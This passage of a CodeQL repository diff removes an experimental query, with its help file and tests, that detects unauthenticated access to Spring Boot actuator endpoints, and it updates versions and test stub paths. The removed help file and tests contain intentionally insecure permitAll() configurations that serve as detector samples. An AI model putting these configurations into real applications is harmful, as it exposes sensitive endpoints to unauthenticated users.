a/java/ql/src/codeql-pack.release.yml +++ b/java/ql/src/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 1.3.1 +lastReleaseVersion: 1.4.0 diff --git a/java/ql/src/codeql-suites/java-ccr.qls b/java/ql/src/codeql-suites/java-code-quality.qls similarity index 100% rename from java/ql/src/codeql-suites/java-ccr.qls rename to java/ql/src/codeql-suites/java-code-quality.qls diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java deleted file mode 100644 index 538620550efc..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.java +++ /dev/null @@ -1,22 +0,0 @@ -@Configuration(proxyBeanMethods = false) -public class SpringBootActuators extends WebSecurityConfigurerAdapter { - - @Override - protected void configure(HttpSecurity http) throws Exception { - // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().permitAll()); - } -} - -@Configuration(proxyBeanMethods = false) -public class ActuatorSecurity extends WebSecurityConfigurerAdapter { - - @Override - protected void configure(HttpSecurity http) throws Exception { - // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().hasRole("ENDPOINT_ADMIN")); - http.httpBasic(); - } -} \ No newline at end of file diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp deleted file mode 100644 index 53ee653aaff3..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qhelp +++ /dev/null @@ -1,39 +0,0 @@ - - - -

    Spring Boot includes a number of additional features called actuators that let you monitor -and interact with your web application. Exposing unprotected actuator endpoints via JXM or HTTP -can, however, lead to information disclosure or even to remote code execution vulnerability.

    -     - - -

    Since actuator endpoints may contain sensitive information, careful consideration should be -given about when to expose them. You should take care to secure exposed HTTP endpoints in the same -way that you would any other sensitive URL. If Spring Security is present, endpoints are secured by -default using Spring Security’s content-negotiation strategy. If you wish to configure custom -security for HTTP endpoints, for example, only allow users with a certain role to access them, -Spring Boot provides some convenient RequestMatcher objects that can be used in -combination with Spring Security.

    -     - - -

    In the first example, the custom security configuration allows unauthenticated access to all -actuator endpoints. This may lead to sensitive information disclosure and should be avoided.

    -

    In the second example, only users with ENDPOINT_ADMIN role are allowed to access -the actuator endpoints.

    - - -     - - -
  • -Spring Boot documentation: -Actuators. -
    • -
  • -Exploiting Spring Boot Actuators -
    • -     -     diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql deleted file mode 100644 index 574336074254..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql +++ /dev/null @@ -1,20 +0,0 @@ -/** - * @name Exposed Spring Boot actuators - * @description Exposing Spring Boot actuators may lead to internal application's information leak - * or even to remote code execution. - * @kind problem - * @problem.severity error - * @precision high - * @id java/spring-boot-exposed-actuators - * @tags security - * experimental - * external/cwe/cwe-16 - */ - -import java -deprecated import SpringBootActuators - -deprecated query predicate problems(PermitAllCall permitAllCall, string message) { - permitAllCall.permitsSpringBootActuators() and - message = "Unauthenticated access to Spring Boot actuator is allowed." -} diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll deleted file mode 100644 index 881f2a131720..000000000000 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.qll +++ /dev/null @@ -1,157 +0,0 @@ -deprecated module; - -import java - -/** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ -class TypeHttpSecurity extends Class { - TypeHttpSecurity() { - this.hasQualifiedName("org.springframework.security.config.annotation.web.builders", - "HttpSecurity") - } -} - -/** - * The class - * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. - */ -class TypeAuthorizedUrl extends Class { - TypeAuthorizedUrl() { - this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", - "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") - } -} - -/** - * The class `org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry`. - */ -class TypeAbstractRequestMatcherRegistry extends Class { - TypeAbstractRequestMatcherRegistry() { - this.hasQualifiedName("org.springframework.security.config.annotation.web", - "AbstractRequestMatcherRegistry>") - } -} - -/** - * The class `org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest`. - */ -class TypeEndpointRequest extends Class { - TypeEndpointRequest() { - this.hasQualifiedName("org.springframework.boot.actuate.autoconfigure.security.servlet", - "EndpointRequest") - } -} - -/** A call to `EndpointRequest.toAnyEndpoint` method. */ -class ToAnyEndpointCall extends MethodCall { - ToAnyEndpointCall() { - this.getMethod().hasName("toAnyEndpoint") and - this.getMethod().getDeclaringType() instanceof TypeEndpointRequest - } -} - -/** - * A call to `HttpSecurity.requestMatcher` method with argument `RequestMatcher.toAnyEndpoint()`. - */ -class RequestMatcherCall extends MethodCall { - RequestMatcherCall() { - this.getMethod().hasName("requestMatcher") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and - this.getArgument(0) instanceof ToAnyEndpointCall - } -} - -/** - * A call to `HttpSecurity.requestMatchers` method with lambda argument - * `RequestMatcher.toAnyEndpoint()`. - */ -class RequestMatchersCall extends MethodCall { - RequestMatchersCall() { - this.getMethod().hasName("requestMatchers") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and - this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall - } -} - -/** A call to `HttpSecurity.authorizeRequests` method. */ -class AuthorizeRequestsCall extends MethodCall { - AuthorizeRequestsCall() { - this.getMethod().hasName("authorizeRequests") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity - } -} - -/** A call to `AuthorizedUrl.permitAll` method. */ -class PermitAllCall extends MethodCall { - PermitAllCall() { - this.getMethod().hasName("permitAll") and - this.getMethod().getDeclaringType() instanceof TypeAuthorizedUrl - } - - /** Holds if `permitAll` is called on request(s) mapped to actuator endpoint(s). */ - predicate permitsSpringBootActuators() { - exists(AuthorizeRequestsCall authorizeRequestsCall | - // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall - or - // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall - | - // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or - // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and - ( - this.getQualifier() instanceof AnyRequestCall or - this.getQualifier() instanceof RegistryRequestMatchersCall - ) - or - // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - // [...].authorizeRequests().anyRequest().permitAll() - authorizeRequestsCall.getNumArgument() = 0 and - exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = registryRequestMatchersCall - ) - or - exists(AnyRequestCall anyRequestCall | - anyRequestCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = anyRequestCall - ) - ) - or - exists(AuthorizeRequestsCall authorizeRequestsCall | - // http.authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof VarAccess - | - // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and - this.getQualifier() instanceof RegistryRequestMatchersCall - or - // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - authorizeRequestsCall.getNumArgument() = 0 and - exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = registryRequestMatchersCall - ) - ) - } -} - -/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. */ -class AnyRequestCall extends MethodCall { - AnyRequestCall() { - this.getMethod().hasName("anyRequest") and - this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry - } -} - -/** - * A call to `AbstractRequestMatcherRegistry.requestMatchers` method with an argument - * `RequestMatcher.toAnyEndpoint()`. - */ -class RegistryRequestMatchersCall extends MethodCall { - RegistryRequestMatchersCall() { - this.getMethod().hasName("requestMatchers") and - this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry and - this.getAnArgument() instanceof ToAnyEndpointCall - } -} diff --git a/java/ql/src/experimental/Security/CWE/CWE-489/TestLib.qll b/java/ql/src/experimental/Security/CWE/CWE-489/TestLib.qll index 1d20dc0db1e0..8279d4d823c5 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-489/TestLib.qll +++ b/java/ql/src/experimental/Security/CWE/CWE-489/TestLib.qll @@ -10,9 +10,4 @@ import java * c) in a test class whose name has the word `test` * d) in a test class implementing a test framework such as JUnit or TestNG */ -predicate isTestMethod(Method m) { - m.getDeclaringType().getName().toLowerCase().matches("%test%") or // Simple check to exclude test classes to reduce FPs - m.getDeclaringType().getPackage().getName().toLowerCase().matches("%test%") or // Simple check to exclude classes in test packages to reduce FPs - exists(m.getLocation().getFile().getAbsolutePath().indexOf("/src/test/java")) or // Match test directory structure of build tools like maven - m instanceof TestMethod // Test method of a test case implementing a test framework such as JUnit or TestNG -} +predicate isTestMethod(LikelyTestMethod m) { any() } diff --git a/java/ql/src/qlpack.yml b/java/ql/src/qlpack.yml index 9a8c5c013395..d7143d40041b 100644 --- a/java/ql/src/qlpack.yml +++ b/java/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/java-queries -version: 1.3.1 +version: 1.4.0 groups: - java - queries diff --git a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected b/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected deleted file mode 100644 index f2874e3694d1..000000000000 --- a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected +++ /dev/null @@ -1,7 +0,0 @@ -| SpringBootActuators.java:6:88:6:120 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:10:5:10:137 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:14:5:14:149 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:18:5:18:101 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:22:5:22:89 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:26:40:26:108 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:30:5:30:113 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | diff --git a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java b/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java deleted file mode 100644 index da59919fbe6c..000000000000 --- a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java +++ /dev/null @@ -1,104 +0,0 @@ -import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest; -import org.springframework.security.config.annotation.web.builders.HttpSecurity; - -public class SpringBootActuators { - protected void configure(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); - } - - protected void configure2(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); - } - - protected void configure3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); - } - - protected void configure4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); - } - - protected void configure5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); - } - - protected void configure6(HttpSecurity http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); - } - - protected void configure7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOk1(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOk2(HttpSecurity http) throws Exception { - http.requestMatchers().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOk3(HttpSecurity http) throws Exception { - http.authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOk4(HttpSecurity http) throws Exception { - http.authorizeRequests(authz -> authz.anyRequest().permitAll()); - } - - protected void configureOkSafeEndpoints1(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests(requests -> requests.anyRequest().permitAll()); - } - - protected void configureOkSafeEndpoints2(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.to("health")).authorizeRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); - } - - protected void configureOkSafeEndpoints3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); - } - - protected void configureOkSafeEndpoints4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOkSafeEndpoints5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); - } - - protected void configureOkSafeEndpoints6(HttpSecurity http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.to("health", "info")).permitAll()); - } - - protected void configureOkSafeEndpoints7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOkNoPermitAll1(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest()); - } - - protected void configureOkNoPermitAll2(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOkNoPermitAll3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOkNoPermitAll4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); - } - - protected void configureOkNoPermitAll5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOkNoPermitAll6(HttpSecurity http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint())); - } - - protected void configureOkNoPermitAll7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); - } -} diff --git a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref b/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref deleted file mode 100644 index ec49ecd718c2..000000000000 --- a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref +++ /dev/null @@ -1 +0,0 @@ -experimental/Security/CWE/CWE-016/SpringBootActuators.ql diff --git a/java/ql/test/experimental/query-tests/security/CWE-016/options b/java/ql/test/experimental/query-tests/security/CWE-016/options index 06ec85dc706c..2ce7a4743cd3 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-016/options +++ b/java/ql/test/experimental/query-tests/security/CWE-016/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/experimental/query-tests/security/CWE-022/options b/java/ql/test/experimental/query-tests/security/CWE-022/options index ff1b8857e3d5..0b08c36d4e13 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-022/options +++ b/java/ql/test/experimental/query-tests/security/CWE-022/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/lingala-zip4j-2.11.5:${testdir}/../../../stubs/software-amazon-awssdk-crt-0.20.3:${testdir}/../../../../stubs/springframework-5.3.8:${testdir}/../../../stubs/reactivestreams-1.0.4:${testdir}/../../../../stubs/slf4j-2.0.0 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/lingala-zip4j-2.11.5:${testdir}/../../../stubs/software-amazon-awssdk-crt-0.20.3:${testdir}/../../../../stubs/springframework-5.8.x:${testdir}/../../../stubs/reactivestreams-1.0.4:${testdir}/../../../../stubs/slf4j-2.0.0 diff --git a/java/ql/test/experimental/query-tests/security/CWE-089/src/main/options b/java/ql/test/experimental/query-tests/security/CWE-089/src/main/options index c72994f8021d..2e128276b78d 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-089/src/main/options +++ b/java/ql/test/experimental/query-tests/security/CWE-089/src/main/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../../stubs/springframework-5.3.8/:${testdir}/../../../../../../stubs/org.mybatis-3.5.4/ +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../../stubs/springframework-5.8.x/:${testdir}/../../../../../../stubs/org.mybatis-3.5.4/ diff --git a/java/ql/test/experimental/query-tests/security/CWE-094/options b/java/ql/test/experimental/query-tests/security/CWE-094/options index d527e41cc4db..110388283dda 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-094/options +++ b/java/ql/test/experimental/query-tests/security/CWE-094/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8:${testdir}/../../../../stubs/jsr223-api:${testdir}/../../../../stubs/scriptengine:${testdir}/../../../../stubs/java-ee-el:${testdir}/../../../../stubs/juel-2.2:${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/jython-2.7.2:${testdir}/../../../../experimental/stubs/rhino-1.7.13:${testdir}/../../../../stubs/bsh-2.0b5:${testdir}/../../../../experimental/stubs/jshell:${testdir}/../../../../experimental/stubs/apache-freemarker-2.3.31:${testdir}/../../../../experimental/stubs/jinjava-2.6.0:${testdir}/../../../../experimental/stubs/pebble-3.1.5:${testdir}/../../../../experimental/stubs/thymeleaf-3.0.14:${testdir}/../../../../experimental/stubs/apache-velocity-2.3 \ No newline at end of file +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x:${testdir}/../../../../stubs/jsr223-api:${testdir}/../../../../stubs/scriptengine:${testdir}/../../../../stubs/java-ee-el:${testdir}/../../../../stubs/juel-2.2:${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/jython-2.7.2:${testdir}/../../../../experimental/stubs/rhino-1.7.13:${testdir}/../../../../stubs/bsh-2.0b5:${testdir}/../../../../experimental/stubs/jshell:${testdir}/../../../../experimental/stubs/apache-freemarker-2.3.31:${testdir}/../../../../experimental/stubs/jinjava-2.6.0:${testdir}/../../../../experimental/stubs/pebble-3.1.5:${testdir}/../../../../experimental/stubs/thymeleaf-3.0.14:${testdir}/../../../../experimental/stubs/apache-velocity-2.3 diff --git a/java/ql/test/experimental/query-tests/security/CWE-1004/options b/java/ql/test/experimental/query-tests/security/CWE-1004/options index 4a9b588c832d..00e92689af58 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-1004/options +++ b/java/ql/test/experimental/query-tests/security/CWE-1004/options @@ -1 +1 @@ -// semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/jsr311-api-1.1.1:${testdir}/../../../../stubs/springframework-5.3.8 \ No newline at end of file +// semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/jsr311-api-1.1.1:${testdir}/../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/experimental/query-tests/security/CWE-348/options b/java/ql/test/experimental/query-tests/security/CWE-348/options index 65ba99fff230..0314ccf85f2f 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-348/options +++ b/java/ql/test/experimental/query-tests/security/CWE-348/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/springframework-5.3.8/:${testdir}/../../../../stubs/apache-commons-lang3-3.7/ \ No newline at end of file +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/springframework-5.8.x/:${testdir}/../../../../stubs/apache-commons-lang3-3.7/ diff --git a/java/ql/test/experimental/query-tests/security/CWE-352/options b/java/ql/test/experimental/query-tests/security/CWE-352/options index 910e399ef1e9..6b4eb708abe4 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-352/options +++ b/java/ql/test/experimental/query-tests/security/CWE-352/options @@ -1 +1 @@ - //semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/apache-http-4.4.13/:${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/fastjson-1.2.74/:${testdir}/../../../../stubs/gson-2.8.6/:${testdir}/../../../../stubs/jackson-databind-2.12/:${testdir}/../../../../stubs/jackson-core-2.12:${testdir}/../../../../stubs/springframework-5.3.8/ + //semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/apache-http-4.4.13/:${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/fastjson-1.2.74/:${testdir}/../../../../stubs/gson-2.8.6/:${testdir}/../../../../stubs/jackson-databind-2.12/:${testdir}/../../../../stubs/jackson-core-2.12:${testdir}/../../../../stubs/springframework-5.8.x/ diff --git a/java/ql/test/experimental/query-tests/security/CWE-470/options b/java/ql/test/experimental/query-tests/security/CWE-470/options index c0d25dba5c23..4073b65ca96b 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-470/options +++ b/java/ql/test/experimental/query-tests/security/CWE-470/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/springframework-5.3.8/:${testdir}/../../../../stubs/google-android-9.0.0 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/springframework-5.8.x/:${testdir}/../../../../stubs/google-android-9.0.0 diff --git a/java/ql/test/experimental/query-tests/security/CWE-502/options b/java/ql/test/experimental/query-tests/security/CWE-502/options index 0c6ef357b21a..2ce7a4743cd3 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-502/options +++ b/java/ql/test/experimental/query-tests/security/CWE-502/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 \ No newline at end of file +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/experimental/query-tests/security/CWE-601/options b/java/ql/test/experimental/query-tests/security/CWE-601/options index ba166b547a02..c2a86d9953b5 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-601/options +++ b/java/ql/test/experimental/query-tests/security/CWE-601/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/springframework-5.3.8/ \ No newline at end of file +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/springframework-5.8.x/ diff --git a/java/ql/test/experimental/query-tests/security/CWE-625/options b/java/ql/test/experimental/query-tests/security/CWE-625/options index 5f11b982510f..d920e397bbf7 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-625/options +++ b/java/ql/test/experimental/query-tests/security/CWE-625/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/springframework-5.3.8 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/experimental/query-tests/security/CWE-652/options b/java/ql/test/experimental/query-tests/security/CWE-652/options index 53ad1f48883e..1d1ea76aeb7d 100644 --- a/java/ql/test/experimental/query-tests/security/CWE-652/options +++ b/java/ql/test/experimental/query-tests/security/CWE-652/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/apache-http-4.4.13/:${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/saxon-xqj-9.x/:${testdir}/../../../../stubs/springframework-5.3.8/ +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/apache-http-4.4.13/:${testdir}/../../../../stubs/servlet-api-2.4:${testdir}/../../../../stubs/saxon-xqj-9.x/:${testdir}/../../../../stubs/springframework-5.8.x/ diff --git a/java/ql/test/library-tests/dataflow/capture/test.expected b/java/ql/test/library-tests/dataflow/capture/test.expected index a98b4990228e..1e8a2d7d3349 100644 --- a/java/ql/test/library-tests/dataflow/capture/test.expected +++ b/java/ql/test/library-tests/dataflow/capture/test.expected @@ -1,10 +1,7 @@ -| A.java:14:14:14:16 | "A" : String | A.java:14:7:14:20 | SSA def(a) : new A(...) { ... } [p] | | A.java:14:14:14:16 | "A" : String | A.java:14:11:14:20 | f2(...) : new A(...) { ... } [p] | | A.java:14:14:14:16 | "A" : String | A.java:15:16:15:16 | a : new A(...) { ... } [p] | | A.java:14:14:14:16 | "A" : String | A.java:15:16:15:22 | get(...) : String | | A.java:14:14:14:16 | "A" : String | A.java:18:8:18:15 | p : String | -| A.java:14:14:14:16 | "A" : String | A.java:18:25:40:3 | SSA def(p) : String | -| A.java:14:14:14:16 | "A" : String | A.java:28:7:38:5 | SSA def(a) : new A(...) { ... } [p] | | A.java:14:14:14:16 | "A" : String | A.java:28:11:38:5 | new (...) : new A(...) { ... } [p] | | A.java:14:14:14:16 | "A" : String | A.java:28:11:38:5 | p : String | | A.java:14:14:14:16 | "A" : String | A.java:30:14:30:16 | parameter this : new A(...) { ... } [p] | @@ -16,16 +13,12 @@ | A.java:14:14:14:16 | "A" : String | A.java:35:26:35:27 | this : new A(...) { ... } [p] | | A.java:14:14:14:16 | "A" : String | A.java:39:12:39:12 | a : new A(...) { ... } [p] | | A.java:14:14:14:16 | "A" : String | A.java:39:12:39:12 | p : String | -| A.java:21:11:21:13 | "B" : String | A.java:14:7:14:20 | SSA def(a) : new A(...) { ... } [String s] | | A.java:21:11:21:13 | "B" : String | A.java:14:11:14:20 | f2(...) : new A(...) { ... } [String s] | | A.java:21:11:21:13 | "B" : String | A.java:15:16:15:16 | a : new A(...) { ... } [String s] | | A.java:21:11:21:13 | "B" : String | A.java:15:16:15:22 | get(...) : String | | A.java:21:11:21:13 | "B" : String | A.java:21:7:21:13 | ...=... : String | -| A.java:21:11:21:13 | "B" : String | A.java:21:7:21:13 | SSA def(s) : String | -| A.java:21:11:21:13 | "B" : String | A.java:21:7:21:13 | [input] SSA phi(s) : String | | A.java:21:11:21:13 | "B" : String | A.java:25:5:25:26 | SSA phi(s) : String | | A.java:21:11:21:13 | "B" : String | A.java:25:5:25:26 | phi(String s) : String | -| A.java:21:11:21:13 | "B" : String | A.java:28:7:38:5 | SSA def(a) : new A(...) { ... } [String s] | | A.java:21:11:21:13 | "B" : String | A.java:28:11:38:5 | String s : String | | A.java:21:11:21:13 | "B" : String | A.java:28:11:38:5 | new (...) : new A(...) { ... } [String s] | | A.java:21:11:21:13 | "B" : String | A.java:30:14:30:16 | parameter this : new A(...) { ... } [String s] | @@ -37,16 +30,12 @@ | A.java:21:11:21:13 | "B" : String | A.java:35:26:35:27 | this : new A(...) { ... } [String s] | | A.java:21:11:21:13 | "B" : String | A.java:39:12:39:12 | String s : String | | A.java:21:11:21:13 | "B" : String | A.java:39:12:39:12 | a : new A(...) { ... } [String s] | -| A.java:23:11:23:13 | "C" : String | A.java:14:7:14:20 | SSA def(a) : new A(...) { ... } [String s] | | A.java:23:11:23:13 | "C" : String | A.java:14:11:14:20 | f2(...) : new A(...) { ... } [String s] | | A.java:23:11:23:13 | "C" : String | A.java:15:16:15:16 | a : new A(...) { ... } [String s] | | A.java:23:11:23:13 | "C" : String | A.java:15:16:15:22 | get(...) : String | | A.java:23:11:23:13 | "C" : String | A.java:23:7:23:13 | ...=... : String | -| A.java:23:11:23:13 | "C" : String | A.java:23:7:23:13 | SSA def(s) : String | -| A.java:23:11:23:13 | "C" : String | A.java:23:7:23:13 | [input] SSA phi(s) : String | | A.java:23:11:23:13 | "C" : String | A.java:25:5:25:26 | SSA phi(s) : String | | A.java:23:11:23:13 | "C" : String | A.java:25:5:25:26 | phi(String s) : String | -| A.java:23:11:23:13 | "C" : String | A.java:28:7:38:5 | SSA def(a) : new A(...) { ... } [String s] | | A.java:23:11:23:13 | "C" : String | A.java:28:11:38:5 | String s : String | | A.java:23:11:23:13 | "C" : String | A.java:28:11:38:5 | new (...) : new A(...) { ... } [String s] | | A.java:23:11:23:13 | "C" : String | 